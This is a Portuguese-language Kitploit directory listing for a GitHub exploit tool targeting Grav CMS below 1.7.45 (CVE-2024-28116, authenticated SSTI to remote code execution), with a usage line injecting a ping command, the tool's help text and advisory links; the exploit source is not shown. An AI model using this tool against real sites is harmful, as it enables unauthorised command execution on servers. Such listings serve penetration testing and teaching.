Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Grav-CMS-RCE-Authenticated — Exploit contra Grav CMS (versões abaixo de 1.7.45) que permite Execução Remota de Código para um usuário autenticado - CVE-2024-28116 | Kitploit
Ferramentas/GitHubGitHub/gunzf0x/grav-cms-rce-authenticated
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubgunzf0x/grav-cms-rce-authenticated

Grav-CMS-RCE-Authenticated

Exploit contra Grav CMS (versões abaixo de 1.7.45) que permite Execução Remota de Código para um usuário autenticado - CVE-2024-28116

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 1 anoAinda não revisado

Grav CMS Execução Remota de Código (Autenticado) - CVE-2024-28116

Informações

Este código é uma adaptação do Graver repositório do Github com algumas melhorias baseadas neste vídeo.

Exploit contra Grav CMS (para versões anteriores a 1.7.45) baseado nas vulnerabilidades SSTI + RCE, identificado como CVE-2024-28116. Este script basicamente cria uma página com a vulnerabilidade, executa-a e, por fim, elimina a página após a execução.

Uso

root@kitploit:~
python3 Grav_CMS_RCE.py -t http://10.10.10.10 -u 'admin' -p 'S3cureP4ssw0rd' -x 'ping -c 1 10.10.10.9'

Mensagem de ajuda:

root@kitploit:~
$ python3 Grav_CMS_RCE.py -h

usage: Grav_CMS_RCE.py [-h] -t TARGET [-P PORT] -u USERNAME -p PASSWORD -x COMMAND [--no-delete-file] [--panel-route PANEL_ROUTE] [--no-banner] [--show-warnings]

Grav CMS RCE (Authenticated).

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URL where Grav CMS is running. Example: http://10.10.10.10
  -P PORT, --port PORT  Port running Grav CMS. Default: 80
  -u USERNAME, --username USERNAME
                        Username to authenticate in Grav CMS
  -p PASSWORD, --password PASSWORD
                        Password for the user in Grav CMS.
  -x COMMAND, --command COMMAND
                        Command to inject/run.
  --no-delete-file      Do NOT delete the generated files. Useful to check command execution output.
  --panel-route PANEL_ROUTE
                        Admin Panel route in Grav CMS. Default: /admin
  --show-warnings       Show warnings (if there are).

Se por algum motivo não quisermos eliminar os ficheiros gerados, podemos usar a flag --no-delete-file, visitar a página indicada pelo script e ler a saída do comando.

Mais informações

Mais informações sobre o CVE-2024-28116/sobre este exploit:

  • Testado em Grav CMS v1.7.44 - Admin 1.10.44.
  • https://github.com/akabe1/Graver
  • https://nvd.nist.gov/vuln/detail/CVE-2024-28116
  • https://ethicalhacking.uk/videos/CVE-2024-28116/#gsc.tab=0
  • https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh

Aviso Legal

O proprietário deste repositório não se responsabiliza pelo uso deste software. Foi criado apenas para fins educacionais.

Licença

  • MIT
Baixar ferramenta